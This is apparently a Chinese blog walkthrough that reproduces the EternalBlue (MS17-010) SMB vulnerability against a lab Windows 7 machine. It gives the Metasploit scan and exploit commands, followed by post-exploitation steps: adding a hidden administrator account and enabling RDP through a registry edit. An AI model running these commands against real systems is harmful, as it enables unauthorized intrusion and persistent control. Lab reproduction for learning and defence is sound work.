一、漏洞简介

1、永恒之蓝介绍:

永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 。勒索病毒的肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。据统计,全球100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。

2、漏洞原理:

永恒之蓝漏洞通过 TCP 的445和139端口,来利用 SMBv1 和 NBT 中的远程代码执行漏洞,通过恶意代码扫描并攻击开放445文件共享端口的 Windows 主机。只要用户主机开机联网,即可通过该漏洞控制用户的主机。不法分子就能在其电脑或服务器中植入勒索病毒、窃取用户隐私、远程控制木马等恶意程序。

3、影响版本:

目前已知受影响的 Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

二、漏洞复现

复现环境:
  • 攻击机:Linux kali(IP:192.168.50.130)

  • 靶机:Windows 7 Enterprise with Service Pack 1 (x64)(IP:192.168.50.132)

实验条件:两台机子可以相互ping通,并且靶机(无补丁)开启了445端口,防火墙是关闭的!

复现过程:
1、主机发现:

登录 kali linux,用 nmap 探测本网段存活主机

nmap 192.168.50.0/24

在这里插入图片描述
可以看到,靶机的445端口是开放的,而永恒之蓝利用的就是445端口的SMB服务,操作系统溢出漏洞。

2、使用MSF的永恒之蓝漏洞模块

打开MSF:msfconsole
在这里插入图片描述
MSF每次打开都会有一个随机的界面,花里胡哨的,不过我喜欢 ~( ̄▽ ̄)~

搜索 ms17-010 代码:search ms17_010
在这里插入图片描述

这里可以得到一些工具,其中
auxiliary/scanner/smb/smb_ms17_010 是永恒之蓝扫描模块, exploit/windows/smb/ms17_010_eternalblue 是永恒之蓝攻击模块。
一般配合使用,前者先扫描,若显示有漏洞,再进行攻击。

3、使用ms17-010扫描模块,对靶机进行扫描:

使用模块:

use auxiliary/scanner/smb/smb_ms17_010

设置目标IP或网段:

set rhosts 192.168.50.132

执行扫描:run
在这里插入图片描述
如果出现以上情况,就说明存在漏洞。

4、使用ms17-010攻击模块,对靶机进行攻击

使用模块:

use exploit/windows/smb/ms17_010_eternalblue

设置攻击目标IP

set rhosts 192.168.50.132

可以使用 show options 命令查看设置选项

在这里插入图片描述
执行攻击:exploit 或 run
在这里插入图片描述
攻击完成!

5、得到靶机shell

在这里插入图片描述
输入:chcp 65001 可解决乱码问题。
在这里插入图片描述
解决了,但是没有完全解决。

6、通过shell对靶机进行控制

1、创建新用户 ,语法:net user 用户名 密码 /add

输入:

net user sss 123456 /add

查看用户信息,命令:net user
在这里插入图片描述
可以看到添加成功了。

2、将用户sss添加至管理员组

net localgroup administrators sss /add

在这里插入图片描述
3、开启远程桌面功能

查看3389端口状态:netstat -ano
在这里插入图片描述
看到3389端口并没有开启,开启3389端口,命令:

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

在这里插入图片描述
3389端口开启。

4、远程桌面连接靶机

rdesktop 192.168.50.132:3389

在这里插入图片描述
使用创建的sss用户进行登录
在这里插入图片描述
登陆成功!
在这里插入图片描述
上面这是一个简单的演示,告诉大家这个漏洞很危险,真正的攻击能做的事情更多。

Logo

为开发者提供学习成长、分享交流、生态实践、资源工具等服务,帮助开发者快速成长。

更多推荐